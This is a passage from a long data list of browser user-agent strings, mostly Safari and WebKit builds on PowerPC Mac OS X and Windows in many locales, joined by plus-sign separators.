fr-fr) AppleWebKit/312.1 (KHTML, like Gecko) Safari/312 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.5.1 (KHTML, like Gecko) Safari/312.3.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.5.2 (KHTML, like Gecko) Safari/312.3.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.5 (KHTML, like Gecko) Safari/312.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.5 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.6 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/412.7 (KHTML, like Gecko) Safari/412.5 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/412 (KHTML, like Gecko) Safari/412 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/416.11 (KHTML, like Gecko) Safari/416.12 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/416.12 (KHTML, like Gecko) Safari/416.13 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/523.10.3 (KHTML, like Gecko) Version/3.0.4 Safari/523.10 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/85.7 (KHTML, like Gecko) Safari/85.5 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/85.8.5 (KHTML, like Gecko) Safari/85.8.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; it-it) AppleWebKit/124 (KHTML, like Gecko) Safari/125.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; it-it) AppleWebKit/312.1 (KHTML, like Gecko) Safari/312 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; it-it) AppleWebKit/312.5.1 (KHTML, like Gecko) Safari/312.3.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; it-it) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.6 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; it-it) AppleWebKit/412.6 (KHTML, like Gecko) Safari/412.2 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; it-it) AppleWebKit/412.7 (KHTML, like Gecko) Safari/412.5 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; it-it) AppleWebKit/416.12 (KHTML, like Gecko) Safari/416.13 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; it-it) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; it-it) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.9.2 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; it-it) AppleWebKit/418.9 (KHTML, like Gecko) Safari/419.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; it-it) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/125.4 (KHTML, like Gecko) Safari/125.9 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/312.5.1 (KHTML, like Gecko) Safari/312.3.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/412.7 (KHTML, like Gecko) Safari/412.5 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/416.12 (KHTML, like Gecko) Safari/416.13 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/418.9.1 (KHTML, like Gecko) Safari/419.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/418.9 (KHTML, like Gecko) Safari/419.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/85.7 (KHTML, like Gecko) Safari/85.5 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; nb-no) AppleWebKit/416.12 (KHTML, like Gecko) Safari/416.13 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; nb-no) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; nb-no) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; nl-nl) AppleWebKit/416.11 (KHTML, like Gecko) Safari/312 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; nl-nl) AppleWebKit/416.11 (KHTML, like Gecko) Safari/416.12 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; nl-nl) AppleWebKit/416.12 (KHTML, like Gecko) Safari/416.13 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; nl-nl) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; nl-nl) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.9.2 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; nl-nl) AppleWebKit/418.8 (KHTML, like Gecko) Safari/419.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; nl-nl) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; pt-pt) AppleWebKit/418.9.1 (KHTML, like Gecko) Safari/419.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; sv-se) AppleWebKit/312.5.1 (KHTML, like Gecko) Safari/312.3.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; sv-se) AppleWebKit/312.5.2 (KHTML, like Gecko) Safari/312.3.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; sv-se) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.5 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; sv-se) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8_Adobe +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; sv-se) AppleWebKit/418.9 (KHTML, like Gecko) Safari/ +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; sv-se) AppleWebKit/418.9 (KHTML, like Gecko) Safari/419.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; sv-se) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; sv-se) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; sv-se) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; sv-se) AppleWebKit/85.7 (KHTML, like Gecko) Safari/85.5 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; tr-tr) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.3 +Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.34 (KHTML, like Gecko) Dooble/1.40 Safari/534.34 +Mozilla/5.0 (Windows; U; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.1.2 Safari/525.21 +Mozilla/5.0 (Windows; U; Windows NT 5.0; en) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2 +Mozilla/5.0 (Windows; U; Windows NT 5.0; en-en) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16 +Mozilla/5.0 (Windows; U; Windows NT 5.1; ca-es) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20 +Mozilla/5.0 (Windows; U; Windows NT 5.1; cs) AppleWebKit/522.13.1 (KHTML, like Gecko) Version/3.0.2 Safari/522.13.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; cs) AppleWebKit/522.15.5 (KHTML, like Gecko) Version/3.0.3 Safari/522.15.5 +Mozilla/5.0 (Windows; U; Windows NT 5.1; cs-CZ) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.29 +Mozilla/5.0 (Windows; U; Windows NT 5.1; cs-CZ) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 +Mozilla/5.0 (Windows; U; Windows NT 5.1; da) AppleWebKit/522.15.5 (KHTML, like Gecko) Version/3.0.3 Safari/522.15.5 +Mozilla/5.0 (Windows; U; Windows NT 5.1; da-DK) AppleWebKit/523.11.1+ (KHTML, like Gecko) Version/3.0.3 Safari/522.15.5 +Mozilla/5.0 (Windows; U; Windows NT 5.1; da-dk) AppleWebKit/523.15.1 (KHTML, like Gecko) Version/3.0.4 Safari/523.15 +Mozilla/5.0 (Windows; U; Windows NT 5.1; da-DK) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13.3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; de) AppleWebKit/522.15.5 (KHTML, like Gecko) Version/3.0.3 Safari/522.15.5 +Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE) AppleWebKit/532+ (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 +Mozilla/5.0 (Windows; U; Windows NT 5.1; el) AppleWebKit/522.13.1 (KHTML, like Gecko) Version/3.0.2 Safari/522.13.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/522.13.1 (KHTML, like Gecko) Version/3.0.2 Safari/522.13.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/522.15.5 (KHTML, like Gecko) Version/3.0.3 Safari/522.15.5 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/522.4.1+ (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/526.9 (KHTML, like Gecko) Version/4.0dp1 Safari/526.8 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB) AppleWebKit/525.19 (KHTML, like Gecko) Version/3.1.2 Safari/525.21 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.17 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.28 (KHTML, like Gecko) Version/3.2.2 Safari/525.28.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525+ (KHTML, like Gecko) Version/3.1.1 Safari/525.17 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.8 (KHTML, like Gecko) +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4 +Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13 +Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES) AppleWebKit/525.28 (KHTML, like Gecko) Version/3.2.2 Safari/525.28.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; fi-FI) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 +Mozilla/5.0 (Windows; U; Windows NT 5.1; fr) AppleWebKit/522.15.5 (KHTML, like Gecko) Version/3.0.3 Safari/522.15.5 +Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR) AppleWebKit/523.15 (KHTML, like Gecko) Version/3.0 Safari/523.15 +Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR) AppleWebKit/525.19 (KHTML, like Gecko) Version/3.1.2 Safari/525.21 +Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR) AppleWebKit/525.28 (KHTML, like Gecko) Version/3.2.2 Safari/525.28.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 +Mozilla/5.0 (Windows; U; Windows NT 5.1; hr) AppleWebKit/522.11.3 (KHTML, like Gecko) Version/3.0 Safari/522.11.3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; hu-HU) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 +Mozilla/5.0 (Windows; U; Windows NT 5.1; id) AppleWebKit/522.11.3 (KHTML, like Gecko) Version/3.0 Safari/522.11.3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; it) AppleWebKit/522.13.1 (KHTML, like Gecko) Version/3.0.2 Safari/522.13.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT) AppleWebKit/525.19 (KHTML, like Gecko) Version/3.1.2 Safari/525.21 +Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT) AppleWebKit/525+ (KHTML, like Gecko) Version/3.1.2 Safari/525.21 +Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4 +Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4 +Mozilla/5.0 (Windows; U; Windows NT 5.1; ko-KR) AppleWebKit/525.28 (KHTML, like Gecko) Version/3.2.2 Safari/525.28.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; nb) AppleWebKit/522.11.3 (KHTML, like Gecko) Version/3.0 Safari/522.11.3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; nb-NO) AppleWebKit/525.28 (KHTML, like Gecko) Version/3.2.2 Safari/525.28.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; nb-NO) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 +Mozilla/5.0 (Windows; U; Windows NT 5.1; nl) AppleWebKit/522.11.3 (KHTML, like Gecko) Version/3.0 Safari/522.11.3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; nl) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; nl) AppleWebKit/522.13.1 (KHTML, like Gecko) Version/3.0.2 Safari/522.13.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL) AppleWebKit/523.12.9 (KHTML, like Gecko) Version/3.0 Safari/523.12.9 +Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL) AppleWebKit/523.15 (KHTML, like Gecko) Version/3.0 Safari/523.15 +Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.17 +Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL) AppleWebKit/525.19 (KHTML, like Gecko) Version/3.1.2 Safari/525.21 +Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR) AppleWebKit/523.15 (KHTML, like Gecko) Version/3.0 Safari/523.15 +Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR) AppleWebKit/525+ (KHTML, like Gecko) Version/3.0 Safari/523.15 +Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 +Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 +Mozilla/5.0 (Windows; U; Windows NT 5.1; ru) AppleWebKit/522.11.3 (KHTML, like Gecko) Version/3.0 Safari/522.11.3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU) AppleWebKit/525.26.2 (KHTML, like Gecko) Version/3.2 Safari/525.26.13 +Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU) AppleWebKit/525.28 (KHTML, like Gecko) Version/3.2.2 Safari/525.28.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 +Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5 +Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4 +Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.11.3 (KHTML, like Gecko) Version/3.0 Safari/522.11.3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.15.5 (KHTML, like Gecko) Version/3.0.3 Safari/522.15.5 +Mozilla/5.0 (Windows; U; Windows NT 5.1; sv-SE) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 +Mozilla/5.0 (Windows; U; Windows NT 5.1; th) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; tr-TR) AppleWebKit/523.15 (KHTML, like Gecko) Version/3.0 Safari/523.15 +Mozilla/5.0 (Windows; U; Windows NT 5.1; zh) AppleWebKit/522.11.3 (KHTML, like Gecko) Version/3.0 Safari/522.11.3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 +Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW) AppleWebKit/523.15 (KHTML, like Gecko) Version/3.0 Safari/523.15 +Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13 +Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 +Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5 +Mozilla/5.0 (Windows; U; Windows NT 5.2; de-DE) AppleWebKit/528+ (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1 +Mozilla/5.0 (Windows; U; Windows NT 5.2; de-DE) AppleWebKit/528+ (KHTML, like Gecko) Version/3.2.2 Safari/525.28.1 +Mozilla/5.0 (Windows; U; Windows NT 5.2; de-DE) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en) AppleWebKit/522.13.1 (KHTML, like Gecko) Version/3.0.2 Safari/522.13.1 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.28 (KHTML, like Gecko) Version/3.2.2 Safari/525.28.1 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8 +Mozilla/5.0 (Windows; U; Windows NT 5.2; nl) AppleWebKit/522.11.3 (KHTML, like Gecko) Version/3.0 Safari/522.11.3 +Mozilla/5.0 (Windows; U; Windows NT 5.2; pt) AppleWebKit/522.11.3 (KHTML, like Gecko) Version/3.0 Safari/522.11.3 +Mozilla/5.0 (Windows; U; Windows NT 5.2; pt-BR) AppleWebKit/525.19 (KHTML, like Gecko) Version/3.1.2 Safari/525.21 +Mozilla/5.0 (Windows; U; Windows NT 5.2; ru-RU) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13.3 +Mozilla/5.0 (Windows; U; Windows NT 5.2; zh) AppleWebKit/522.13.1 (KHTML, like Gecko) Version/3.0.2 Safari/522.13.1 +Mozilla/5.0 (Windows; U; Windows NT 6.0; cs) AppleWebKit/522.15.5 (KHTML, like Gecko) Version/3.0.3 Safari/522.15.5 +Mozilla/5.0 (Windows; U; Windows NT 6.0; da-DK) AppleWebKit/523.12.9 (KHTML, like Gecko) Version/3.0 Safari/523.12.9 +Mozilla/5.0 (Windows; U; Windows NT 6.0; de-DE) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 +Mozilla/5.0 (Windows; U; Windows NT 6.0; de-DE) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/522.15.5 (KHTML, like Gecko) Version/3.0.3 Safari/522.15.5 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/525+ (KHTML, like Gecko) Version/3.0.4 Safari/523.11 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-gb) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/523.15 (KHTML, like Gecko) Version/3.0 Safari/523.15 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.17 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Version/3.1.2 Safari/525.21 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27 +Mozilla/5.0 (Windows; U; Windows NT 6.0; es-es) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 +Mozilla/5.0 (Windows; U; Windows NT 6.0; fi) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2 +Mozilla/5.0 (Windows; U; Windows NT 6.0; fr-ch) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9 +Mozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/525.19 (KHTML, like Gecko) Version/3.1.2 Safari/525.21 +Mozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 +Mozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1 +Mozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5 +Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 +Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528+ (KHTML, like Gecko) Version/4.0 Safari/528.16 +Mozilla/5.0 (Windows; U; Windows NT 6.0; hu-HU) AppleWebKit/525.26.2 (KHTML, like Gecko) Version/3.2 Safari/525.26.13 +Mozilla/5.0 (Windows; U; Windows NT 6.0; hu-HU) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 +Mozilla/5.0 (Windows; U; Windows NT 6.0; hu-HU) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4 +Mozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 +Mozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1 +Mozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 +Mozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27 +Mozilla/5.0 (Windows; U; Windows NT 6.0; nb-NO) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5 +Mozilla/5.0 (Windows; U; Windows NT 6.0; nl) AppleWebKit/522.11.3 (KHTML, like Gecko) Version/3.0 Safari/522.11.3 +Mozilla/5.0 (Windows; U; Windows NT 6.0; nl) AppleWebKit/522.13.1 (KHTML, like Gecko) Version/3.0.2 Safari/522.13.1 +Mozilla/5.0 (Windows; U; Windows NT 6.0; pl-PL) AppleWebKit/525.19 (KHTML, like Gecko) Version/3.1.2 Safari/525.21 +Mozilla/5.0 (Windows; U; Windows NT 6.0; pl-PL) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1 +Mozilla/5.0 (Windows; U; Windows NT 6.0; ru-RU) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 +Mozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE) AppleWebKit/523.13 (KHTML, like Gecko) Version/3.0 Safari/523.13 +Mozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1 +Mozilla/5.0 (Windows; U; Windows NT 6.0; tr-TR) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5 +Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-TW) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1 +Mozilla/5.0 (Windows; U; Windows NT 6.1; cs-CZ) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27 +Mozilla/5.0 (Windows; U; Windows NT 6.1; de-DE) AppleWebKit/525.28 (KHTML, like Gecko) Version/3.2.2 Safari/525.28.1 +Mozilla/5.0 (Windows; U; Windows NT 6.1; de-DE) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532+ (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0 Safari/533.16 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27 +Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 +Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0 Safari/533.16 +Mozilla/5.0 (Windows; U; Windows NT 6.1; fr-FR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27 +Mozilla/5.0 (Windows; U; Windows NT 6.1; ja-JP) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 +Mozilla/5.0 (Windows; U; Windows NT 6.1; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4 +Mozilla/5.0 (Windows; U; Windows NT 6.1; ko-KR) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 +Mozilla/5.0 (Windows; U; Windows NT 